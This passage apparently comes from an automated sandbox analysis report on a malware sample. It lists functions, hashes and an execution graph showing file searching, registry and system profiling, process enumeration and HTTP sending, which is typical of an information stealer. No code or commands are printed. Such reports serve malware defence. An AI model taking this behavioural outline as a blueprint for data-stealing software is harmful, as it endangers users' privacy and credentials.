                                                                                                                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                                                                                                                            • Opcode ID: f08038336877ba2055013fe106da734548454ba1eb369ff9e4785e88f2fb5500
                                                                                                                                                                                                                                                            • Instruction ID: 4eb8e4530c559572481263f7e2b412b24d9bbf18607b689a7a5a511735e14b2f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f08038336877ba2055013fe106da734548454ba1eb369ff9e4785e88f2fb5500
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2313731D0CB484FDB28ABA898566FE7BE0EF55321F00423FD05AC31A2DF74A5068781
                                                                                                                                                                                                                                                            Function 00007FFD9B7E20DD Relevance: 1.6, APIs: 1, Instructions: 116threadCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1728281949.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_sysadmin.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ResumeThread
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 947044025-0
                                                                                                                                                                                                                                                            • Opcode ID: a7be529b097f9d0238c53325a3c09cdae8d87737eb372ca1f0d867f01fb98721
                                                                                                                                                                                                                                                            • Instruction ID: 32e84b755a1b58e3ee002dcc594bb2c597d8a7f2cd030fe639f3dbc86443027c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7be529b097f9d0238c53325a3c09cdae8d87737eb372ca1f0d867f01fb98721
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E8312830A0D7884FDB5ADBA888566E97FE0EF57320F0442AFD089C71E7DA785406CB51

                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                            Function 00007FFD9B7E1105 Relevance: .4, Instructions: 395COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1728281949.00007FFD9B7E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7E0000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ffd9b7e0000_sysadmin.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 4f9df70476c209744385201ad899e016206cbba8dc301e028e44bcaa13bd1928
                                                                                                                                                                                                                                                            • Instruction ID: 1b5078d805fa8689885d5b48e1143292ac8b2249162837bc8789fbc407371660
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f9df70476c209744385201ad899e016206cbba8dc301e028e44bcaa13bd1928
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7EC1F736B0D29A4FD715EB68E8A66E97BB0EF42319F0941F7D08DCB1A3CE246445C790

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:12.4%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:4.3%
                                                                                                                                                                                                                                                            Total number of Nodes:162
                                                                                                                                                                                                                                                            Total number of Limit Nodes:1
                                                                                                                                                                                                                                                            execution_graph 10794 423646 Process32Next 10795 42365d 10794->10795 10796 41e504 10797 41e50d RtlFreeHeap 10796->10797 10798 41e521 10797->10798 10800 42d98b GetUserNameW 10801 409d4a 10802 409d70 connect 10801->10802 10804 41edd1 GetVolumeInformationA 10805 41ee1e 10804->10805 10812 41ff59 10813 41ff84 RegQueryValueExA 10812->10813 10814 42bf5b 10815 42bf7b FindNextFileA 10814->10815 10817 409499 10818 4094ae InternetOpenUrlA 10817->10818 10820 409c5b socket 10824 42bd1e 10825 42bd39 FindFirstFileA 10824->10825 10827 40a09e recv 10828 4281a3 10829 4281be CreateThread 10828->10829 10831 428206 10829->10831 10832 42b95a 10829->10832 10833 42b97c 10832->10833 10834 420420 memset 10835 420464 RegOpenKeyExA 10834->10835 10836 41fe65 RegEnumKeyExA 10837 401124 10838 401145 RegOpenKeyExA 10837->10838 10840 404468 10841 404488 InternetCrackUrlA 10840->10841 10843 40450b 10841->10843 10844 409ca9 10845 409ce9 getaddrinfo 10844->10845 10848 409e2c 10849 409e47 send 10848->10849 10854 41e72c 10855 41e746 RtlAllocateHeap 10854->10855 10857 41efef GetCurrentHwProfileA 10858 4235ec CreateToolhelp32Snapshot Process32First 10862 41f1f3 10863 41f216 RegQueryValueExA 10862->10863 10864 41f23d 10863->10864 10865 4236f0 TerminateProcess 10866 42370e 10865->10866 10866->10866 10867 41f6b3 GetLocaleInfoA 10868 4095f3 10869 4095b6 10868->10869 10869->10868 10870 409597 InternetReadFile 10869->10870 10870->10869 10871 422b74 K32GetModuleFileNameExA 10872 422b90 10871->10872 10873 42daba 10874 42dac7 10873->10874 10885 42cfda 10873->10885 10891 42cbea 10873->10891 10897 42c354 GetModuleFileNameA 10873->10897 10899 42c391 GetFileAttributesA 10873->10899 10901 42cf30 Sleep 10873->10901 10903 42cf83 10873->10903 10909 42ce9c 10873->10909 10913 42c8b8 10873->10913 10937 42c6c8 10873->10937 10947 42caf8 10873->10947 10886 42d011 10885->10886 10953 4070a7 InternetReadFile 10886->10953 10887 42d044 10889 4070a7 InternetReadFile 10887->10889 10888 42d11d 10889->10888 10892 42cc21 10891->10892 10954 4070a7 InternetReadFile 10892->10954 10893 42cd5c 10896 4290bf 13 API calls 10893->10896 10894 42cdc0 10896->10894 10898 42c379 10897->10898 10900 42c3b3 10899->10900 10902 42cf56 10901->10902 10904 42cfa3 10903->10904 10905 42cfb1 10904->10905 10955 422384 CreateStreamOnHGlobal 10904->10955 10956 421c6f LoadLibraryW 10904->10956 10957 4224d8 10904->10957 10910 42ceb3 10909->10910 10964 42ab19 10910->10964 10914 42c8f1 10913->10914 10973 4070a7 InternetReadFile 10914->10973 10915 42c924 10922 4070a7 InternetReadFile 10915->10922 10916 42c9aa 10920 4070a7 InternetReadFile 10916->10920 10921 407189 InternetCloseHandle 10916->10921 10917 42ca30 10923 41f9a3 GetSystemInfo 10917->10923 10924 426f96 GlobalMemoryStatusEx 10917->10924 10925 420268 Process32Next 10917->10925 10926 41f53d GetTimeZoneInformation 10917->10926 10927 4201ff CreateToolhelp32Snapshot Process32First 10917->10927 10928 426f8c GlobalMemoryStatusEx 10917->10928 10918 42ca75 10929 415c33 8 API calls 10918->10929 10930 4153f2 26 API calls 10918->10930 10931 415814 6 API calls 10918->10931 10932 4158e9 FindFirstFileA FindNextFileA GetFileAttributesA 10918->10932 10933 415739 8 API calls 10918->10933 10934 41551c GetFileAttributesA 10918->10934 10935 415a1e GetFileAttributesA 10918->10935 10919 42cad1 10920->10917 10921->10917 10922->10916 10923->10918 10924->10918 10925->10918 10926->10918 10927->10918 10928->10918 10929->10919 10930->10919 10931->10919 10932->10919 10933->10919 10934->10919 10935->10919 10938 42c6ee CreateDirectoryA 10937->10938 10974 42b6b8 10938->10974 10978 42b7fd 10938->10978 10940 42c7b6 10942 404af2 HttpOpenRequestA 10940->10942 10943 404f86 InternetReadFile 10940->10943 10944 404ae9 HttpOpenRequestA 10940->10944 10941 42c86d 10942->10941 10943->10941 10944->10941 10948 42cb2f 10947->10948 11014 4070a7 InternetReadFile 10948->11014 10949 42cb62 10952 402740 FindFirstFileA FindFirstFileA 10949->10952 10950 42cbc6 10952->10950 10958 4224ed 10957->10958 10963 406333 InternetReadFile 10958->10963 10959 4225bb CloseWindow 10961 42263c 10959->10961 10961->10905 10965 42ab42 10964->10965 10970 42a4e5 10965->10970 10966 42ac25 10968 42a4e5 FindFirstFileA 10966->10968 10967 42ac92 10968->10967 10971 42a51c FindFirstFileA 10970->10971 10975 42b6d8 10974->10975 10982 42b2bd 10975->10982 10979 42b810 10978->10979 11006 42b180 10979->11006 10983 42b2e5 10982->10983 10991 407751 InternetConnectA 10983->10991 10992 4077bf 10983->10992 10995 40764d 10983->10995 10999 40785a 10983->10999 11002 4077b6 10983->11002 11005 407913 InternetReadFile 10983->11005 10993 4077c6 HttpOpenRequestA 10992->10993 10996 40767e InternetOpenA 10995->10996 10998 4076f4 10996->10998 11000 407876 HttpSendRequestA 10999->11000 11001 4078a8 11000->11001 11003 4077c6 HttpOpenRequestA 11002->11003 11007 42b1ac 11006->11007 11011 407a42 InternetCloseHandle 11007->11011 11013 407913 InternetReadFile 11007->11013 11012 407a0b 11011->11012 11018 42d6fe 11019 42d719 ShellExecuteExA memset 11018->11019 11021 42d877 ExitProcess 11019->11021 11022 42d89b 11021->11022 11023 42b9be 11024 42b9ca 11023->11024 11029 406333 InternetReadFile 11024->11029 11030 40658c 11024->11030 11033 406456 InternetCloseHandle 11024->11033 11031 4065a8 HttpSendRequestA 11030->11031 11034 406472 11033->11034

                                                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                                                            Function 00428248 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 719 428248-428300 call 43a170 FindFirstFileA memset * 2
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: memset$FileFindFirst
                                                                                                                                                                                                                                                            • String ID: %s\*.*
                                                                                                                                                                                                                                                            • API String ID: 2180624105-1013718255
                                                                                                                                                                                                                                                            • Opcode ID: ee3cd0bef39285e60ec048c7d744cdacfd10b79e9f049abb3da976af403e7ac3
                                                                                                                                                                                                                                                            • Instruction ID: 0a6b2ea63025e97e5e598bf4e61c55c08c71b8a32124561313a11673bac0cd5d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee3cd0bef39285e60ec048c7d744cdacfd10b79e9f049abb3da976af403e7ac3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8611E776A002445BD710DB99DC85D9B3BACDB8A350F05017CF919D3342E6789F58CBA4
                                                                                                                                                                                                                                                            Function 0040B846 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                            control_flow_graph 805 40b846-40b894 CreateDesktopA 806 40b897-40b98a 805->806
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateDesktop
                                                                                                                                                                                                                                                            • String ID: %s%s"$OCALAPPDATA
                                                                                                                                                                                                                                                            • API String ID: 3054513912-3945843140
                                                                                                                                                                                                                                                            • Opcode ID: 860e00e64f807195728f0608d2f0bd4457fba2b31b2b7ff1c9972e30e191eb60
                                                                                                                                                                                                                                                            • Instruction ID: 3d2972af386316d9be50767083905085ccda19580b27f6f880edc31ac63f85e4
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 860e00e64f807195728f0608d2f0bd4457fba2b31b2b7ff1c9972e30e191eb60
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8310876A502008BD714DF68DDC0BA937F4EF9A704F08816DE809D7312E674EA95CB59
                                                                                                                                                                                                                                                            Function 0040CCEA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0040CDF7
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                            • String ID: $|X
                                                                                                                                                                                                                                                            • API String ID: 1974802433-3892261830
                                                                                                                                                                                                                                                            • Opcode ID: 93ba6a4fb0da29434ce8e6e354f19ad1ebedb407e9703d29a19c9622524f0e29
                                                                                                                                                                                                                                                            • Instruction ID: f96707184f20121d0bda5babc62ec9bbf22f85a6a0252dbd6d8119ede72c3401
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 93ba6a4fb0da29434ce8e6e354f19ad1ebedb407e9703d29a19c9622524f0e29
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 97318DB67011109FDB14DBACDCC0BA973B5AFCA308F054878E019D3352DB38AE198B59
                                                                                                                                                                                                                                                            Function 0040177C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 90fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 004019DA
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                            • API String ID: 1974802433-1173974218
                                                                                                                                                                                                                                                            • Opcode ID: 45da029c2d2ac17479f9af7bbc5d6394cf2116e07b0005f993176921ea4e3c3e
                                                                                                                                                                                                                                                            • Instruction ID: 22346f696f13e9549d8facf84d4ffd02b2e8a1bb9ee0c0cc419566cfbec9e226
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45da029c2d2ac17479f9af7bbc5d6394cf2116e07b0005f993176921ea4e3c3e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A3140BAA001659FC715DF98DCA1AED73B4FF86308B04447CA519E3251EA34BF49CB58
                                                                                                                                                                                                                                                            Function 0041008C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00410141
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                            • String ID: \*.*
                                                                                                                                                                                                                                                            • API String ID: 1974802433-1173974218
                                                                                                                                                                                                                                                            • Opcode ID: 46a0960487acdacf2fd8ef0d0d4f45aa313d752388bab4cdc5630ddcade3ae05
                                                                                                                                                                                                                                                            • Instruction ID: 71774e874bff6838fcadcdfaea7023f42c996f402008a6bac7216c547bb6b296
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 46a0960487acdacf2fd8ef0d0d4f45aa313d752388bab4cdc5630ddcade3ae05
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51218B3A7001549BCB14CFACDCC9F9977B5EF8A308F044079A519E3391EA34AE19CB69
                                                                                                                                                                                                                                                            Function 0042A4E5 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 0042A548
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                                                            • API String ID: 1974802433-766152087
                                                                                                                                                                                                                                                            • Opcode ID: 147f18f658a4627c497f47d40985670674bd45b1b97b9c5dcec16a5a094effb5
                                                                                                                                                                                                                                                            • Instruction ID: 0609e92204065f63010fd7ad1d7f6de40c2cf777a2a57bed9933e9f42ca579c2
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 147f18f658a4627c497f47d40985670674bd45b1b97b9c5dcec16a5a094effb5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9901FE76D012145FD704DF55ECC1DAA3B79AF86325B054038E81AF7391E630EE58C7A4
                                                                                                                                                                                                                                                            Function 0042BD1E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 0042BD60
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                            • String ID: %s\*
                                                                                                                                                                                                                                                            • API String ID: 1974802433-766152087
                                                                                                                                                                                                                                                            • Opcode ID: c3e509897c29787022350f80ffc0ff6cef781e262badee9c2a4ab92802de6c54
                                                                                                                                                                                                                                                            • Instruction ID: 931b0de070de10b7e66256f6a66663b599e1610311875de6a1b42976d5bd7aee
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c3e509897c29787022350f80ffc0ff6cef781e262badee9c2a4ab92802de6c54
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF054B66202059FD704DF6CEC91D6A33ECAB85214F040939BC15D3352EA75B9088B54
                                                                                                                                                                                                                                                            Function 0041F53D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28timeCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32 ref: 0041F573
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InformationTimeZone
                                                                                                                                                                                                                                                            • String ID: 6l
                                                                                                                                                                                                                                                            • API String ID: 565725191-3579878408
                                                                                                                                                                                                                                                            • Opcode ID: d1f1aa9db316d0556c24cff3fcebf8ffe5a39d00abe2e1027b6969b4bb4cace5
                                                                                                                                                                                                                                                            • Instruction ID: 51eb3bd1622886aac5f8ccd9b6177312287d20add2d8b6e62fb82a58f3c5e34c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d1f1aa9db316d0556c24cff3fcebf8ffe5a39d00abe2e1027b6969b4bb4cace5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 52E092BA700200BBD32CDF3CDDD5F5A36A99B86364B15463CB125CB3D9D9719C148658
                                                                                                                                                                                                                                                            Function 004201FF Relevance: 3.0, APIs: 2, Instructions: 33processCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0042023A
                                                                                                                                                                                                                                                            • Process32First.KERNEL32(00000000,?), ref: 0042024A
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CreateFirstProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2353314856-0
                                                                                                                                                                                                                                                            • Opcode ID: 51a0a3a86996dd71d6c256b735e4ff4c0fdb01524f04b67741bc59405e23ec16
                                                                                                                                                                                                                                                            • Instruction ID: c579f703dafad097f5d9c0689e3975df6c889f8e9946543bcf98fd5d00d92f8f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51a0a3a86996dd71d6c256b735e4ff4c0fdb01524f04b67741bc59405e23ec16
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 50F0BE767003215BDB24CF2ADC85F5BBBA9FBC6300F084819B455CB391CA70D814CB69
                                                                                                                                                                                                                                                            Function 004018DA Relevance: 1.6, APIs: 1, Instructions: 94fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 004019DA
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                                                                                                            • Opcode ID: 3c1b4fee3c951a545f55fd42dc46924680b74bce36de95e4240348f77afb1a4e
                                                                                                                                                                                                                                                            • Instruction ID: 384581a553c9b641a9d9dadc207eefd58bf68b9b5068ecbce6f45e1e004277aa
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c1b4fee3c951a545f55fd42dc46924680b74bce36de95e4240348f77afb1a4e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D13120BAA001649FC704DF98DC91AAD73B9EFC5608B08446CB51AE3351EA74BF45CB58
                                                                                                                                                                                                                                                            Function 0040E749 Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0040E7FD
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                                                                                                            • Opcode ID: ca8952b2d87523698d5ab2caeaa578ab4bbb1f7eb8d0a0ed884b13eb9ba42fca
                                                                                                                                                                                                                                                            • Instruction ID: 6d01b9231f5bbaf653de1ab32846f44ac3f5364cab858fddac85960c65a6f770
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca8952b2d87523698d5ab2caeaa578ab4bbb1f7eb8d0a0ed884b13eb9ba42fca
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2521DB366002048FCB14DF9CCCC4FA937A5AB8A314F044538B429E7352DA34AA18CB5A
                                                                                                                                                                                                                                                            Function 00412AC9 Relevance: 1.6, APIs: 1, Instructions: 71fileCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00412B77
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileFindFirst
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1974802433-0
                                                                                                                                                                                                                                                            • Opcode ID: 219f719297c6cbb6f48a629ba439f8744997e797cd7ddcf31338611ae8ca9535
                                                                                                                                                                                                                                                            • Instruction ID: 8bab2d8d4da6b135567d6663b7f8523f409fe4a46747f795839d2863d3a3a458
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 219f719297c6cbb6f48a629ba439f8744997e797cd7ddcf31338611ae8ca9535
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA2192BAB002049FCB18DBACEC81EDD73B6EFC6305B184124A815D3351DA34AE15CB59
                                                                                                                                                                                                                                                            Function 0041F9A3 Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000004.00000002.2322436575.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: InfoSystem
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 31276548-0
                                                                                                                                                                                                                                                            • Opcode ID: 1b2d5af43dd12cc97f1ca22d2a4559b3dc75b8610e382d2f08405efa2324d8b1
                                                                                                                                                                                                                                                            • Instruction ID: d6f07fd9729eab18bf35d97595002372c1d2e6aa75cde9e8f8970a3912b3b12f
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b2d5af43dd12cc97f1ca22d2a4559b3dc75b8610e382d2f08405efa2324d8b1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09F0A0B7A000186BD2209759FC81D9B77ADEFCA21CB090121FA5993311E2256E1E86BA
                                                                                                                                                                                                                                                            Function 0040C009 Relevance: 1.5, APIs: 1, Instructions: 30encryptionCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
